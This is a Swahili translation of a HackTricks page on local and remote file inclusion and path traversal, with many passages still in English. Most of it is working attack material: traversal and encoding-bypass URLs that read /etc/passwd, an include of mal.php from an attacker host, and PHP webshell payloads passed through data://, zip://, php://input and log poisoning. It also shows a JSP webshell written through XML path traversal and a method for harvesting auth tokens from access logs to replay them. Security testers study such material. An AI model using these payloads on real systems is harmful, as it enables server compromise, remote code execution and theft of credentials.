File Inclusion/Path traversal

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

File Inclusion

Remote File Inclusion (RFI): Faili inapakiwa kutoka kwenye server ya mbali (Bora: Unaweza kuandika code na server itaiendesha). Katika php hii ime imezimwa kwa default (allow_url_include).
Local File Inclusion (LFI): Seva inapakia faili ya ndani.

Udhaifu hutokea wakati mtumiaji anaweza kudhibiti kwa namna fulani faili ambayo itapakiwa na seva.

Funsi za PHP zilizo hatarini: require, require_once, include, include_once

Chombo kizuri cha ku-exploit udhaifu huu: https://github.com/kurobeats/fimap

Blind - Interesting - LFI2RCE files

wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

Linux

Kujumuisha orodha kadhaa za *nix LFI na kuongeza njia zaidi, niliunda hii:

Auto_Wordlists/wordlists/file_inclusion_linux.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Pia jaribu kubadilisha / kwa \
Pia jaribu kuongeza ../../../../../

Orodha inayotumia mbinu mbalimbali kutafuta faili /etc/password (kwa ajili ya kuangalia ikiwa udhaifu upo) inaweza kupatikana here

Windows

Muungano wa wordlists tofauti:

Auto_Wordlists/wordlists/file_inclusion_windows.txt at main \xc2\xb7 carlospolop/Auto_Wordlists \xc2\xb7 GitHub

Pia jaribu kubadilisha / kwa \
Pia jaribu kuondoa C:/ na kuongeza ../../../../../

Orodha inayotumia mbinu mbalimbali kutafuta faili /boot.ini (kwa ajili ya kuangalia ikiwa udhaifu upo) inaweza kupatikana here

OS X

Angalia orodha ya LFI ya linux.

Msingi wa LFI and bypasses

Mifano yote ni kwa ajili ya Local File Inclusion lakini inaweza pia kutumika kwa Remote File Inclusion (page=http://myserver.com/phpshellcode.txt\.

http://example.com/index.php?page=../../../etc/passwd

traversal sequences zimeondolewa bila kurudia (non-recursively)

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://some.domain.com/static/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null byte (%00)

Bypass kuongezwa kwa characters zaidi mwishoni mwa string iliyotolewa (bypass of: $_GET[‘param’].“php”)

http://example.com/index.php?page=../../../etc/passwd%00

Hii ni imetatuliwa tangu PHP 5.4

Usimbaji

Unaweza kutumia usimbaji usio wa kawaida kama double URL encode (na mengine):

http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

HTML-to-PDF SVG/IMG path traversal

Modern HTML-to-PDF engines (e.g. TCPDF or wrappers such as html2pdf) zinachambua kwa urahisi HTML, SVG, CSS, na font URLs zilizotolewa na mshambuliaji, lakini zinaendesha ndani ya mitandao ya backend inayotegemewa yenye ufikiaji wa filesystem. Mara tu unaweza kuingiza HTML ndani ya $pdf->writeHTML()/Html2Pdf::writeHTML(), mara nyingi unaweza exfiltrate faili za ndani ambazo akaunti ya web server inaweza kusoma.

• Fingerprint the renderer: kila PDF iliyotengenezwa ina Producer field (mfano TCPDF 6.8.2). Kujua build kamili kunakuambia ni path filters gani zipo na je, URL decoding inatokea kabla ya validation.
• Inline SVG payloads: TCPDF::startSVGElementHandler() husoma xlink:href attribute kutoka kwa elementi za <image> kabla ya kuendesha urldecode(). Kuingiza malicious SVG ndani ya data URI hufanya HTML sanitizers nyingi kupuuza payload wakati TCPDF bado inaichambua:

<img src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMCAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciPjxpbWFnZSB4bGluazpocmVmPSIuLi8uLi8uLi8uLi8uLi90bXAvdXNlcl9maWxlcy91c2VyXzEvcHJpdmF0ZV9pbWFnZS5wbmciIGhlaWdodD0iMTAwJSIgd2lkdGg9IjEwMCUiLz48L3N2Zz4=" />

TCPDF prepends $_SERVER['DOCUMENT_ROOT'] to paths beginning with / and only later resolves .., so use either leading ../../.. segments or /../../.. to escape the root after the prepend.

• Encoding to bypass naive filters: Versions ≤6.8.2 only check for the literal substring ../ before decoding the URL. Sending ..%2f (or ..%2F) in the SVG or in a raw <img src> attribute bypasses the check, because the traversal dot-dot-slash sequence is recreated only after TCPDF calls urldecode().
• Double-encoding for multi-stage decoding: If user input is decoded by the web framework and by TCPDF, double-encode the slash (%252f). One decode turns it into %2f, the second decode in TCPDF turns it into /, yielding /..%252f.. → /../../../… without ever showing ../ to the early filter.
• HTML <img> handler: TCPDF::openHTMLTagHandler() contains the same order-of-operations bug, allowing direct HTML payloads such as src="%2f..%252f..%252ftmp%252fsecret.png" to read any locally reachable bitmap.

Mbinu hii leaks chochote kinachosomwa na PDF worker (passport scans, API keys rendered as images, etc.). Hardeners walirekebisha tatizo hili katika 6.9.1 kwa kuifanya canonicalising ya paths (isRelativePath()), hivyo wakati wa majaribio pendelea matoleo ya zamani ya Producer.

Kutoka kwenye folda iliyopo

Labda back-end inakagua njia ya folda:

http://example.com/index.php?page=utils/scripts/../../../../../etc/passwd

Kuchunguza Saraka za Mfumo wa Faili kwenye Seva

Mfumo wa faili wa seva unaweza kuchunguzwa kwa rekursive ili kubaini saraka, sio tu faili, kwa kutumia mbinu fulani. Mchakato huu unahusisha kubaini kina cha saraka na kuchunguza uwepo wa folda maalum. Hapo chini kuna njia ya kina ya kufanikisha hili:

1. Tambua Kina cha Saraka: Tambua kina cha saraka ulipo kwa kupata kwa mafanikio faili ya /etc/passwd (inatumika ikiwa seva ni Linux-based). Mfano wa URL unaweza kuundwa kama ifuatavyo, unaonyesha kina cha tatu:

http://example.com/index.php?page=../../../etc/passwd # depth of 3

2. Chunguza Folda: Ongeza jina la folda unayodhania (kwa mfano, private) kwenye URL, kisha rudi kwa /etc/passwd. Ngazi ya ziada ya folda inahitaji kuongeza kina kwa moja:

http://example.com/index.php?page=private/../../../../etc/passwd # depth of 3+1=4

3. Tafsiri Matokeo: Jibu la server linaonyesha kama folda ipo:

• Hitilafu / Hakuna Matokeo: Folda private huenda haipo mahali ulilotajwa.
• Yaliyomo ya /etc/passwd: Uwepo wa folda private unathibitishwa.

4. Uchunguzi wa Kurudia: Folda zilizogunduliwa zinaweza kuchunguzwa zaidi kwa ajili ya subdirectories au faili kwa kutumia mbinu ile ile au za jadi za Local File Inclusion (LFI).

Ili kuchunguza directories katika maeneo tofauti kwenye mfumo wa faili, rekebisha payload ipasavyo. Kwa mfano, ili kuangalia kama /var/www/ ina directory private (ikiwa current directory iko kwa kina cha 3), tumia:

http://example.com/index.php?page=../../../var/www/private/../../../etc/passwd

Path Truncation Technique

Path truncation ni mbinu inayotumika kubadilisha njia za faili katika maombi ya wavuti. Mara nyingi hutumika kupata faili zilizozuiliwa kwa kuzunguka tahadhari fulani za usalama ambazo huongeza herufi za ziada mwishoni mwa njia za faili. Lengo ni kuunda njia ya faili ambayo, mara itakaporodheshwa au kubadilishwa na tahadhari hizo, bado itamuongoza faili linalotakiwa.

In PHP, uwakilishi mbalimbali wa njia za faili unaweza kutazamwa kuwa sawa kutokana na asili ya mfumo wa faili. Kwa mfano:

• /etc/passwd, /etc//passwd, /etc/./passwd, and /etc/passwd/ are all treated as the same path.
• When the last 6 characters are passwd, appending a / (making it passwd/) doesn’t change the targeted file.
• Similarly, if .php is appended to a file path (like shellcode.php), adding a /. at the end will not alter the file being accessed.

Mifano iliyopewa inaonyesha jinsi ya kutumia path truncation kufikia /etc/passwd, lengo la kawaida kutokana na maudhui yake nyeti (user account information):

http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

http://example.com/index.php?page=a/./.[ADD MORE]/etc/passwd
http://example.com/index.php?page=a/../../../../[ADD MORE]../../../../../etc/passwd

Katika matukio haya, idadi ya traversals zinazohitajika inaweza kuwa takriban 2027, lakini nambari hiyo inaweza kutofautiana kulingana na usanidi wa server.

• Using Dot Segments and Additional Characters: Traversal sequences (../) zilizochanganywa na dot segments za ziada na characters zinaweza kutumika kuvinjari file system, kwa ufanisi kupuuza appended strings zinazoongezwa na server.
• Determining the Required Number of Traversals: Kupitia majaribio na makosa, mtu anaweza kubaini idadi kamili ya ../ zinazohitajika kufikia root directory na kisha /etc/passwd, kuhakikisha kuwa appended strings (kama .php) zinaneutralize lakini path inayotakwa (/etc/passwd) inabaki bila kuathiriwa.
• Starting with a Fake Directory: Ni desturi ya kawaida kuanza path kwa directory isiyokuwepo (kama a/). Mbinu hii inatumiwa kama hatua ya tahadhari au kutimiza mahitaji ya logic ya path parsing ya server.

Unapotumia path truncation techniques, ni muhimu kuelewa tabia ya server katika path parsing na muundo wa filesystem. Kila tukio linaweza kuhitaji mbinu tofauti, na majaribio mara nyingi yanahitajika ili kupata njia yenye ufanisi zaidi.

Udhaifu huu ulirekebishwa katika PHP 5.3.

Filter bypass tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Maintain the initial path: http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

Remote File Inclusion

Katika php hili limezimwa kwa chaguo-msingi kwa sababu allow_url_include iko Off. Inapaswa kuwa On ili lifanye kazi, na katika kesi hiyo unaweza kujumuisha PHP file kutoka kwenye server yako na kupata RCE:

http://example.com/index.php?page=http://atacker.com/mal.php
http://example.com/index.php?page=\\attacker.com\shared\mal.php

Ikiwa kwa sababu yoyote allow_url_include iko On, lakini PHP inachuja upatikanaji wa wavuti za nje, according to this post, unaweza kutumia kwa mfano data protocol na base64 ku-decode code ya PHP ya b64 na kupata RCE:

PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.txt

Hifadhi ya .git Iliyofichuka (Ufunuo wa Chanzo)

Ikiwa server ya wavuti inaonyesha /.git/, mshambuliaji anaweza mara nyingi kujenga upya hifadhi nzima (ikiwemo historia ya commits) na kukagua programu bila mtandao. Hii kawaida hufunua endpoints zilizofichwa, siri, maswali ya SQL, na utendakazi unaopatikana kwa msimamizi pekee.

Mikaguzi ya haraka:

curl -s -i http://TARGET/.git/HEAD
curl -s -i http://TARGET/.git/config

Pakua repository kwa git-dumper:

uv tool install git-dumper
git-dumper http://TARGET/.git/ out/

Kisha urejeshe working tree:

cd out
git checkout .

Tip

Katika code ya hapo awali, +.txt ya mwisho iliongezwa kwa sababu attacker alihitaji string iliyomalizika na .txt, hivyo string inamalizika nayo na baada ya b64 decode sehemu hiyo itarudisha taka tu na PHP halisi itajumuishwa (na kwa hivyo, itatekelezwa).

Mfano mwingine kutotumia protokoli ya php:// ungekuwa:

data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+txt

Kipengele cha Root cha Python

Katika Python, katika msimbo kama huu:

# file_name is controlled by a user
os.path.join(os.getcwd(), "public", file_name)

Ikiwa mtumiaji awasilisha absolute path kwa file_name, njia ya awali huondolewa tu:

os.path.join(os.getcwd(), "public", "/etc/passwd")
'/etc/passwd'

Hili ndilo tabia iliyokusudiwa kulingana na the docs:

Ikiwa sehemu ni njia kamili (absolute path), sehemu zote za awali zitatupwa na kuunganishwa kunaendelea kutoka sehemu ya njia kamili.

Java Orodhesha direktori

Inaonekana kwamba ikiwa una Path Traversal katika Java na ukaomba direktori badala ya faili, orodha ya direktori itarudishwa. Hii haitatokea katika lugha nyingine (afaik).

Vigezo 25 vya juu

Hapa kuna orodha ya vigezo 25 vya juu ambavyo vinaweza kuwa hatarini kwa local file inclusion (LFI) vulnerabilities (from link):

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

LFI / RFI using PHP wrappers & protocols

php://filter

PHP filters zinaruhusu kufanya operesheni za msingi za urekebishaji wa data kabla ya kusomwa au kuandikwa. Kuna aina 5 za filters:

• String Filters:
• string.rot13
• string.toupper
• string.tolower
• string.strip_tags: Ondoa tags kutoka kwenye data (kila kitu kati ya chars “<” na “>”)
• Note that this filter has disappear from the modern versions of PHP
• Conversion Filters
• convert.base64-encode
• convert.base64-decode
• convert.quoted-printable-encode
• convert.quoted-printable-decode
• convert.iconv.* : Inabadilisha hadi encoding tofauti (convert.iconv.<input_enc>.<output_enc>). Ili kupata orodha ya encodings zote zinazotungwa endesha kwenye console: iconv -l

Warning

Abusing the convert.iconv.* conversion filter you can generate arbitrary text, which could be useful to write arbitrary text or make a function like include process arbitrary text. For more info check LFI2RCE via php filters.

• Compression Filters
• zlib.deflate: Compress the content (useful if exfiltrating a lot of info)
• zlib.inflate: Decompress the data
• Encryption Filters
• mcrypt.* : Deprecated
• mdecrypt.* : Deprecated
• Other Filters
• Running in php var_dump(stream_get_filters()); you can find a couple of unexpected filters:
• consumed
• dechunk: reverses HTTP chunked encoding
• convert.*

# String Filters
## Chain string.toupper, string.rot13 and string.tolower reading /etc/passwd
echo file_get_contents("php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd");
## Same chain without the "|" char
echo file_get_contents("php://filter/string.toupper/string.rot13/string.tolower/resource=file:///etc/passwd");
## string.string_tags example
echo file_get_contents("php://filter/string.strip_tags/resource=data://text/plain,<b>Bold</b><?php php code; ?>lalalala");

# Conversion filter
## B64 decode
echo file_get_contents("php://filter/convert.base64-decode/resource=data://plain/text,aGVsbG8=");
## Chain B64 encode and decode
echo file_get_contents("php://filter/convert.base64-encode|convert.base64-decode/resource=file:///etc/passwd");
## convert.quoted-printable-encode example
echo file_get_contents("php://filter/convert.quoted-printable-encode/resource=data://plain/text,£hellooo=");
=C2=A3hellooo=3D
## convert.iconv.utf-8.utf-16le
echo file_get_contents("php://filter/convert.iconv.utf-8.utf-16le/resource=data://plain/text,trololohellooo=");

# Compresion Filter
## Compress + B64
echo file_get_contents("php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd");
readfile('php://filter/zlib.inflate/resource=test.deflated'); #To decompress the data locally
# note that PHP protocol is case-inselective (that's mean you can use "PhP://" and any other varient)

Warning

Sehemu “php://filter” haina utofauti wa herufi

Using php filters as oracle to read arbitrary files

In this post inapendekeza teknik ya kusoma faili ya ndani bila kupata output iliyorejeshwa na server. Teknik hii inategemea boolean exfiltration ya faili (char kwa char) ikitumia php filters kama oracle. Hii ni kwa sababu php filters zinaweza kutumika kufanya maandishi kuwa makubwa vya kutosha ili php isukume exception.

Katika post ya asili unaweza kupata maelezo ya kina ya teknik hii, lakini hapa kuna muhtasari mfupi:

• Tumia codec UCS-4LE kuweka herufi ya mbele ya maandishi mwanzoni na kufanya ukubwa wa string iongezeke kwa mdundo wa eksponential.
• Hii italetwa kutumika kuzalisha maandishi kuwa makubwa sana wakati herufi ya mwanzo imekadiriwa kwa usahihi kiasi kwamba php itachochea error
• Filter ya dechunk itaondoa kila kitu ikiwa char ya kwanza sio hexadecimal, hivyo tunaweza kujua kama char ya kwanza ni hex.
• Hii, ikichanganywa na ile iliyotangulia (na filters nyingine kulingana na herufi inayokadiriwa), itaturuhusu kukisia herufi mwanzoni mwa maandishi kwa kuona wakati tunapo fanya mabadiliko ya kutosha ili isibaki tabia ya hexadecimal. Kwa sababu ikiwa ni hex, dechunk haitaiondoa na bomu la awali litasababisha php error.
• Codec convert.iconv.UNICODE.CP930 hubadilisha kila herufi kuwa ile inayofuata (kwa hivyo baada ya codec hii: a -> b). Hii inatuwezesha kugundua kama herufi ya kwanza ni a kwa mfano kwa sababu tukitumia codec hii mara 6 a->b->c->d->e->f->g herufi haitakuwa tena character ya hexadecimal, kwa hivyo dechunk haitaiifuta na php error itachochewa kwa sababu inazidisha na bomu la awali.
• Kutumia mabadiliko mengine kama rot13 mwanzoni inawezekana leak chars nyingine kama n, o, p, q, r (na codecs nyingine zinaweza kutumika kuhamisha herufi nyingine katika safu ya hex).
• Wakati char ya mwanzo ni namba inahitajika kuitumia base64 encode na leak herufi 2 za kwanza ili leak nambari.
• Shida ya mwisho ni kuona jinsi ya leak zaidi ya herufi ya mwanzo. Kwa kutumia order memory filters kama convert.iconv.UTF16.UTF-16BE, convert.iconv.UCS-4.UCS-4LE, convert.iconv.UCS-4.UCS-4LE inawezekana kubadilisha mpangilio wa chars na kupata katika nafasi ya kwanza herufi nyingine za maandishi.
• Na ili kuweza kupata further data wazo ni kuzalisha 2 bytes za junk data mwanzoni kwa kutumia convert.iconv.UTF16.UTF16, tumia UCS-4LE ili kufanya pivot na bytes 2 zilizofuata, na delete the data until the junk data (hii itaondoa bytes 2 za kwanza za maandishi ya awali). Endelea kufanya hivi hadi ufikie biti unayotaka leak.

Katika post pia ilitolewa tool ya kufanya hii kwa automatic: php_filters_chain_oracle_exploit.

php://fd

Wrapper hii inaruhusu kufikia file descriptors ambazo mchakato ameziweka wazi. Inaweza kuwa muhimu exfiltrate yaliyomo ya faili zilizofunguliwa:

echo file_get_contents("php://fd/3");
$myfile = fopen("/etc/passwd", "r");

Unaweza pia kutumia php://stdin, php://stdout and php://stderr kufikia file descriptors 0, 1 and 2 mtawalia (sijui jinsi hii ingeweza kuwa ya msaada katika shambulio)

zip:// and rar://

Pakia faili la Zip au Rar lenye PHPShell ndani na ufikie.
Ili uweze kutumia protokoli ya rar, inahitaji kuwezeshwa kwa njia maalum.

echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
zip payload.zip payload.php;
mv payload.zip shell.jpg;
rm payload.php

http://example.com/index.php?page=zip://shell.jpg%23payload.php

# To compress with rar
rar a payload.rar payload.php;
mv payload.rar shell.jpg;
rm payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

data://

http://example.net/?page=data://text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data://text/plain,<?php phpinfo(); ?>
http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
http://example.net/?page=data:text/plain,<?php echo base64_encode(file_get_contents("index.php")); ?>
http://example.net/?page=data:text/plain,<?php phpinfo(); ?>
http://example.net/?page=data:text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Kumbuka kuwa protokoli hii imezuiwa na mipangilio ya php allow_url_open na allow_url_include

expect://

Expect inapaswa kuwezeshwa. Unaweza kutekeleza code kwa kutumia hii:

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

input://

Taja payload yako katika POST parameters:

curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

phar://

File ya .phar inaweza kutumika kutekeleza PHP code wakati web application inatumia functions kama include kwa ajili ya kupakia faili. Kipande cha PHP code kilicho hapa chini kinaonyesha uundaji wa faili ya .phar:

<?php
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); system("ls"); ?>');
$phar->stopBuffering();

Ili kukusanya faili la .phar, amri ifuatayo inapaswa kutekelezwa:

php --define phar.readonly=0 create_path.php

Baada ya kutekelezwa, faili inayoitwa test.phar itaumbwa, ambayo inaweza kutumika kuonelea udhaifu wa Local File Inclusion (LFI).

Katika kesi ambapo LFI inafanya tu kusoma faili bila kutekeleza msimbo wa PHP ndani yake, kupitia functions such as file_get_contents(), fopen(), file(), file_exists(), md5_file(), filemtime(), au filesize(), inawezekana kujaribu eksploit ya udhaifu wa deserialization. Udhaifu huu unahusiana na kusoma faili kwa kutumia protocol ya phar.

Kwa ufahamu wa kina wa kutumia udhaifu wa deserialization katika muktadha wa faili za .phar, rejea hati iliyoangaziwa hapa chini:

Phar Deserialization Exploitation Guide

phar:// deserialization

CVE-2024-2961

Ilikuwa inawezekana kutumika kwa mabaya any arbitrary file read from PHP that supports php filters ili kupata RCE. Maelezo ya kina yanaweza kupatikana found in this post.
Muhtasari mfupi: 3 byte overflow kwenye PHP heap ilitumika kubadilisha chain of free chunks za ukubwa maalum ili kuwawezesha kuandika chochote kwenye anwani yoyote, hivyo akawekwa hook ili kuitisha system.
Ilikuwa inawezekana ku-alloc chunks za ukubwa maalum kwa kutumia zaidi ya php filters.

More protocols

Angalia protocols to include here:

• php://memory and php://temp — Andika kwenye memory au katika faili ya muda (sijui jinsi hii inaweza kuwa na umuhimu katika shambulio la file inclusion)
• file:// — Kupata filesystem ya ndani
• http:// — Kupata HTTP(s) URLs
• ftp:// — Kupata FTP(s) URLs
• zlib:// — Compression Streams
• glob:// — Kupata pathnames zinazolingana na pattern (haitorudishi kitu chochote kinachoweza kuchapishwa, hivyo siyo ya manufaa hapa)
• ssh2:// — Secure Shell 2
• ogg:// — Audio streams (Haifai kusoma faili yoyote ile)

LFI via PHP’s ‘assert’

Hatari za Local File Inclusion (LFI) katika PHP ni kubwa hasa wakati wa kushughulika na function ‘assert’, ambayo inaweza kutekeleza msimbo ndani ya strings. Hii ni tatizo hasa ikiwa input yenye tabia za directory traversal kama “..” inachunguzwa lakini haijatakaswa ipasavyo.

Kwa mfano, msimbo wa PHP unaweza kubuniwa kuzuia directory traversal kama ifuatavyo:

assert("strpos('$file', '..') === false") or die("");

Wakati hili linakusudia kuzuia traversal, kwa bahati mbaya linatengeneza vector kwa ajili ya code injection. Ili kuitumia kusoma yaliyomo ya faili, mshambuliaji anaweza kutumia:

' and die(highlight_file('/etc/passwd')) or '

Vivyo hivyo, kwa kutekeleza amri yoyote ya mfumo, mtu anaweza kutumia:

' and die(system("id")) or '

Ni muhimu URL-encode these payloads.

PHP Blind Path Traversal

Warning

Mbinu hii inahusiana na kesi ambapo wewe unadhibiti file path ya PHP function ambayo itafanya access a file lakini hautaona yaliyomo ya faili (kama simu rahisi kwa file()) lakini yaliyomo hayataonyeshwa.

In this incredible post inaelezwa jinsi blind path traversal inaweza kutumiwa kupitia PHP filter ili exfiltrate the content of a file via an error oracle.

Kwa muhtasari, mbinu inatumia “UCS-4LE” encoding kufanya yaliyomo ya faili kuwa kubwa kiasi kwamba PHP function opening faili itasababisha error.

Kisha, ili leak the first char filter dechunk inatumika pamoja na nyingine kama base64 au rot13, na mwishowe filters convert.iconv.UCS-4.UCS-4LE na convert.iconv.UTF16.UTF-16BE zinatumika place other chars at the beggining and leak them.

Functions that might be vulnerable: file_get_contents, readfile, finfo->file, getimagesize, md5_file, sha1_file, hash_file, file, parse_ini_file, copy, file_put_contents (only target read only with this), stream_get_contents, fgets, fread, fgetc, fgetcsv, fpassthru, fputs

Kwa maelezo ya kiufundi angalia chapisho lililotajwa!

LFI2RCE

Arbitrary File Write via Path Traversal (Webshell RCE)

Wakati server-side code inayopokea/kuupload faili inajenga destination path kwa kutumia data inayoendeshwa na mtumiaji (mf., filename au URL) bila ku-canonicalising na ku-validate, .. segments na absolute paths zinaweza kutoroka folda iliyokusudiwa na kusababisha arbitrary file write. Ikiwa unaweza kuweka payload chini ya web-exposed directory, kawaida unapata unauthenticated RCE kwa kuacha webshell.

Typical exploitation workflow:

• Tambua write primitive katika endpoint au background worker inayokubali path/filename na kuandika content kwenye disk (mf., message-driven ingestion, XML/JSON command handlers, ZIP extractors, n.k.).
• Tambua web-exposed directories. Mifano ya kawaida:
• Apache/PHP: /var/www/html/
• Tomcat/Jetty: <tomcat>/webapps/ROOT/ → drop shell.jsp
• IIS: C:\inetpub\wwwroot\ → drop shell.aspx
• Tengeneza traversal path inayovunja kutoka kwenye storage directory iliyokusudiwa kwenda webroot, na uwashirie webshell content yako.
• Tembelea payload uliyoiachia na utekeleze amri.

Notes:

• Huduma yenye udhaifu inayofanya uandishi inaweza kusikiliza kwenye port isiyo-HTTP (mf., JMF XML listener kwenye TCP 4004). Portal kuu ya wavuti (port tofauti) baadaye itahudumia payload yako.
• Katika Java stacks, uandishi wa faili hizi mara nyingi hutekelezwa kwa concatenation rahisi ya File/Paths. Ukosefu wa canonicalisation/allow-listing ndilo shida kuu.

Generic XML/JMF-style example (product schemas vary – the DOCTYPE/body wrapper is irrelevant for the traversal):

<?xml version="1.0" encoding="UTF-8"?>
<JMF SenderID="hacktricks" Version="1.3">
<Command Type="SubmitQueueEntry">
<!-- Write outside the intake folder into the webroot via traversal -->
<Resource Name="FileName">../../../webapps/ROOT/shell.jsp</Resource>
<Data>
<![CDATA[
<%@ page import="java.io.*" %>
<%
String c = request.getParameter("cmd");
if (c != null) {
Process p = Runtime.getRuntime().exec(c);
try (var in = p.getInputStream(); var out = response.getOutputStream()) {
in.transferTo(out);
}
}
%>
]]>
</Data>
</Command>
</JMF>

Kuimarisha usalama kunakoweza kuzuia daraja hili la hitilafu:

• Rekebisha hadi canonical path na zinazofanya kazi, na hakikisha ni mrithi wa saraka ya msingi iliyoorodheshwa (allow-listed).
• Kataa njia yoyote inayojumuisha .., absolute roots, au drive letters; pendelea generated filenames.
• Endesha writer kama akaunti yenye vibali vidogo na gawanya saraka za kuandika mbali na served roots.

Remote File Inclusion

Imeelezwa hapo awali, follow this link.

Kupitia Apache/Nginx log file

Ikiwa server ya Apache au Nginx ni vulnerable to LFI ndani ya include function unaweza kujaribu kufikia /var/log/apache2/access.log or /var/log/nginx/access.log, weka ndani ya user agent au ndani ya GET parameter php shell kama <?php system($_GET['c']); ?> na include faili hiyo

Warning

Tambua kwamba ikiwa utatumia double quotes kwa shell badala ya simple quotes, double quotes zitatobolewa kuwa string “quote;”, PHP itatoa error hapo na hakutakuwa na chochote kingine kitakachotekelezwa.

Pia, hakikisha una andika payload kwa usahihi au PHP itakosa kila mara inapo jaribu kupakia faili ya log na hautapata nafasi ya pili.

Hii pia inaweza kufanywa kwenye logs nyingine lakini kuwa mwangalifu, code ndani ya logs inaweza kuwa URL encoded na hii inaweza kuharibu Shell. Header authorisation “basic” ina “user:password” katika Base64 na inatafsiriwa ndani ya logs. PHPShell inaweza kuingizwa ndani ya header hii.
Njia nyingine zinazowezekana za log:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/apache/error.log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Fuzzing wordlist: https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI

Soma access logs ili kuvuna GET-based auth tokens (token replay)

Apps nyingi kwa makosa zinakubali session/auth tokens kupitia GET (mfano, AuthenticationToken, token, sid). Ikiwa una primitive ya path traversal/LFI kuelekea web server logs, unaweza kuiba token hizo kutoka access logs na kuzireplay ili kupita kabisa authentication.

How-to:

• Tumia traversal/LFI kusoma web server access log. Maeneo ya kawaida:
• /var/log/apache2/access.log, /var/log/httpd/access_log
• /var/log/nginx/access.log
• Baadhi ya endpoints hurudisha file reads Base64-encoded. Ikiwa ndivyo, decode ndani ya mashine yako na ukague mistari ya log.
• Tumia Grep kwa GET requests ambazo zinajumuisha token parameter na chukua thamani yake, kisha replay dhidi ya application entry point.

Example flow (generic):

GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1
Host: target

Dekoda body ikiwa ni Base64, kisha rudisha token iliyorekodiwa:

GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1
Host: target

Vidokezo:

• Tokens kwenye URLs zinaandikwa kwa chaguo-msingi; kamwe usikubali bearer tokens kupitia GET kwenye mifumo ya uzalishaji.
• Ikiwa app inasaidia majina mengi ya token, tafuta vifunguo vya kawaida kama AuthenticationToken, token, sid, access_token.
• Zungusha tokens yoyote ambayo inaweza kuwa imeleaked kwenye logs.

Kupitia Barua pepe

Tuma barua pepe kwa akaunti ya ndani (user@localhost) yenye PHP payload yako kama <?php echo system($_REQUEST["cmd"]); ?> na jaribu ku-include kwenye barua ya mtumiaji kwa njia kama /var/mail/<USERNAME> au /var/spool/mail/<USERNAME>

Kupitia /proc//fd/

1. Upload shells nyingi (kwa mfano: 100)
2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be brute forced) and $FD the file descriptor (can be brute forced too)

Kupitia /proc/self/environ

Kama faili ya log, tuma payload ndani ya User-Agent; itatafsiriwa ndani ya faili /proc/self/environ

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Kupitia upload

Ikiwa unaweza upload faili, ingiza tu shell payload ndani yake (kwa mfano: <?php system($_GET['c']); ?>).

http://example.com/index.php?page=path/to/uploaded/file.png

